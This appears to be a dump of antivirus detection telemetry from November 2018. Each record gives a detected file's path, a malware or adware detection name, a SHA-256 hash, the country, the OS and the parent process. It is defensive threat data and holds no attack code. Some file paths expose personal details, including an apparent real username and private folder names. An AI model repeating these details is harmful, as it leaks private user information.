  Row(detection=Row(filename='avscan-20181101-094608-120e6796', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094608-120E6796', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:46:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0064494.exe', filepath='H:\\System Volume Information\\_restore{0738878F-378D-4612-8350-34AD094C736F}\\RP257\\A0064494.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='c0c958dd6dc1ac87b061972c14e5c09a131ecdb4dcc3e8f3407eb30b25b4371a', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:49:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsv78E.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-01T18:26:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093732-af24e201', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093732-AF24E201', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:37:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152127-83106ee0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152127-83106EE0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:21:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='3455.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\3455.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='master doc.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\TESI MASTER\\master doc.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir', filepath='\\\\?\\C:\\Applications\\Service.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='NG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T19:29:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\jcdzsblerbz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T06:38:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\ilchxgjadly\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:44:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='asa.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\SOCIO SANITARI\\ASA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:13:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='2017_12_4.grp', filepath='\\?\\D:\\amittest\\Apsara\\Mail\\Deleted Items\\2017_12_4.grp', filesize=1796000, name='HEUR/AGEN.1020733.#M1.#R1'), hash='d69b79d134f1db003ae99e80f34ca51144564775e9a58491cfa4afc1279a9ed1', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:19:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sicurezza nei luoghi di lavoro.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\DOCENZE\\SICUREZZA NEI LUOGHI DI LAVORO.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:22:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='prove.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\TESI MASTER\\master doc\\prove.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='iddbas32.dll', filepath='C:\\Program Files\\Common Files\\Borland Shared\\BDE\\IDDBAS32.DLL', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='f45291519629901e49456c172f56d6dc83ee69050860f8825362aa2d32e70b46', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:15:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-151147-13dcb4a6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-151147-13DCB4A6', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:11:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='b084cf08163b6768b9fb5fdc15569b7ee9a4720cfb3518e16787dcc28140d003', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\B084CF08163B6768B9FB5FDC15569B7EE9A4720CFB3518E16787DCC28140D003', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='b084cf08163b6768b9fb5fdc15569b7ee9a4720cfb3518e16787dcc28140d003', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:28:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=0, name='TR/Patched.Ren.Gen.#M2.#R3780'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:02:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Program Files\\InstallShield Installation Information\\{79D0F056-39DE-4FDD-83FD-1554CE2C6443}\\setup.exe', filesize=892000, name='W32/Sality.AW.#M1.#R1'), hash='9b83e17cb032b8ecc38e3a03738583b90281148c402d2a621b62fbc543bcafe6', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T19:51:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dfhkgexh.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\DfHKGeXh.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:04:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\qtrdsbwlnsy\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T13:40:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='17316b0d887f92c5a868aa5490a92ce57be3387bb7480c2596359c5266b554fb.mrg', filepath='D:\\TotalAutomation\\CategorizationLayer\\05.12.2017-214.available\\Avira\\Others\\PE-detected-Avira\\ADWARE.EoRezo.Gen7\\17316b0d887f92c5a868aa5490a92ce57be3387bb7480c2596359c5266b554fb.MRG', filesize=832000, name='ADWARE/EoRezo.Gen7.#M300.#R602706'), hash='17316b0d887f92c5a868aa5490a92ce57be3387bb7480c2596359c5266b554fb', metadata=Row(cmdline='D:\\\\\\\\TotalAutomation\\\\\\\\CategorizationLayer\\\\\\\\07.05.2018-119.available\\\\\\\\Avira\\\\\\\\Others\\\\\\\\PE-detected-Avira -PERHASH', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\TotalAutomation\\Dependencies\\Buf\\WWPERHASH.exe', parentsize=1842176, timestamp='2018-11-04T08:19:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline='\\\\\\/LOADSAVEDWINDOWS', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T12:03:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-13-14-05.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-11-03T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T18:16:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='em000_32.dll', filepath='C:\\Program Files\\ESET\\ESET Security\\Modules\\em000_32\\1029\\em000_32.dll', filesize=112000, name='TR/Crypt.XPACK.Gen.#M300.#R3761'), hash='95391fab785fadc038740c59bcb8c8e03216702ae5459f4793d2b0d83906ce78', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:41:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090119-3f02cbf7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ca757762\\AVSCAN-20181104-084814-A417CACE\\AVSCAN-20181104-090119-3F02CBF7', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T02:01:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='oeaw0c92d3d.dll', filepath='\\\\?\\C:\\Windows\\OeAW0c92d3d.dll', filesize=192000, name='Adware/Elex.xjuch.#M1.#R1'), hash='50450cd74f7e00ab23864f3a22f66217446dc76563594c16209c7d84999ca55d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:35:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='spynote.exe', filepath='\\\\?\\D:\\Pastas da Área de Trabalho\\BATOTA\\SpyNote v2\\SpyNote.exe', filesize=832000, name='W32/Neshta.A.#M1.#R1'), hash='79401e28d42a14229332f00a63abc8af5a7caa713a71af54a463b179e351f2ed', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:54:19Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='50e94290bf0319cc4dceb7eb6f207d4e38ef0d51', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\50e94290bf0319cc4dceb7eb6f207d4e38ef0d51', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='49ba3b6696e35b3ffbfb8c7ffc9ea1ea101dd303ca8a4a2fd967824ac379219f', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:32:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-114748-3bba61d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d3632b0d\\AVSCAN-20181104-114628-2CCBA48D\\AVSCAN-20181104-114748-3BBA61D1', filesize=1920000, name='TR/Black.Gen2.#M1.#R1'), hash='43204df86a8293ef7b82c2c05b67b1d4ceeeacf209a5b889a950818050258adf', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:40:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Downloads\\nhm_windows_1.9.0.7\\bin_3rdparty\\ewbf\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\nhm_windows_1.9.0.7\\NiceHashMinerLegacy.exe', parentsize=1468416, timestamp='2018-11-04T13:57:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:02:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T18:06:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp9322044\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T04:14:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp3636975\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:16:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-104638-f69d5c61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_ab747340\\AVSCAN-20181104-104550-EF10721B\\AVSCAN-20181104-104638-F69D5C61', filesize=1152000, name='TR/Black.Gen2.#M1.#R1'), hash='49122a4c62ca3899baaee3cbe273b2981a28785b1a12f1f5d2456df00079a019', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T02:47:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-120932-2a5ddf58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_01c59ad9\\AVSCAN-20181104-115336-A527B541\\AVSCAN-20181104-120932-2A5DDF58', filesize=3584000, name='PUA/iLivid.iona.#M1.#R1'), hash='168bf72980da7f57450bcbf1045a4bd4fd25b9a4338ac9177cb2f1cbb2d52164', metadata=Row(cmdline=None, country='AM', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T08:09:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190447-22c479bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_29129829\\AVSCAN-20181104-190314-13C079E5\\AVSCAN-20181104-190447-22C479BD', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:04:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered tirer', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered tirer', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='5a1c0f7b3e01da7404c587a35dc1822cdfe5f1d736223a7df4755a19b4592470', metadata=Row(cmdline=None, country='CO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T20:50:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='e1046d0dcb9c974d8d9d9f99b0a7edcd8d99bc7f', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\e1046d0dcb9c974d8d9d9f99b0a7edcd8d99bc7f', filesize=320000, name='Adware/DealPly.71c641.#M1.#R1'), hash='71c641a389c810c7e23cb36733aba8d48ccf3d73dbcd4e03c9b75d551f527c79', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T18:10:53Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0001ea49', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0001ea49', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:19:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T12:37:16Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-150708-9cd35401', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-150708-9CD35401', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5642847f2a431c9c5852b1e5ebe606f11acd628c251cc8d30f75beadc612518d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:07:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wordpad.exe', filepath='C:\\Program Files\\Windows NT\\Accessories\\wordpad.exe', filesize=4608000, name='TR/Patched.Gen.#M300.#R5151'), hash='0601ec0cf3b4ce7d3f82163520f8ad07a423fd089363108a90e8746e85d64610', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T08:45:02Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ecddeecdabbfaabbfdaebcadebfaaeeffabbccdebffdeeccaeefcaec.ecddeecdabbfaabbfdaebcadebfaaeeffabbccdebffdeeccaeefcaec', filepath='g:\\\xa0\\ecddeecdabbfaabbfdaebcadebfaaeeffabbccdebffdeeccaeefcaec.ecddeecdabbfaabbfdaebcadebfaaeeffabbccdebffdeeccaeefcaec', filesize=7360000, name='WORM/Lodbak.Gen.#M300.#R7758'), hash='33d8a14588f7ed3324bb88bf818c7d26a21e8a7fa9d7efc84555d47565a3707c', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T23:30:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181105-020317-4eb9b21d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0a311ac5\\AVSCAN-20181105-020219-474F587D\\AVSCAN-20181105-020317-4EB9B21D', filesize=1792000, name='HEUR/APC.#M1.#R1'), hash='4a2b3eb2d63ba8c05df30e1702786634f69490f9ce6a3fdeb19b4829b7482f00', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:03:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='outside caller 08-26-2016 17e395c.zip', filepath='Outside Caller 08-26-2016 17e395c.zip', filesize=8000, name='HEUR/Suspar.Gen.#M0.#R0'), hash='22f75846c98f01d3c621aff911fa633dd4dc915fe1106ecdf7bc9cbcc811b4cb', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T15:48:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T08:04:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-130920-f1bc3314', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7376951a\\AVSCAN-20181104-130803-E6FA562D\\AVSCAN-20181104-130920-F1BC3314', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:09:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0345238.exe', filepath='F:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP438\\A0345238.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='32b0d34ab16a2d7df472e6d2dd1895000221fcb97e6d645cbbf34ddae7f28197', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T11:03:18Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='08_2013_creditreport.pdf.zip --> 08_2013_creditreport.pdf.exe', filepath='08_2013_creditreport.pdf.zip --> 08_2013_creditreport.pdf.exe', filesize=128000, name='HEUR/AGEN.1008096.#M15.#R1008096'), hash='4cc4ab82dd1a81fee2f997eef4e81b806cefb6d53e77e94dea3c0318e9fc85af', metadata=Row(cmdline=None, country='GB', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T01:08:50Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='“自动恢复”保存资格预审文件(一标段).asd', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Word\\“自动恢复”保存资格预审文件(一标段).asd', filesize=164992000, name='HEUR/Macro.Word2000.#M1.#R1'), hash='8f577eef656c90ae670e6ca5cd34c0b1a8d23f73bdc44c0013bad06f5fb481d7', metadata=Row(cmdline='\\\\\\/n \\\\\\/dde', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Office\\Office12\\WINWORD.EXE', parentsize=347432, timestamp='2018-11-04T14:14:18Z'), dt=datetime.date(2018, 11, 4)),
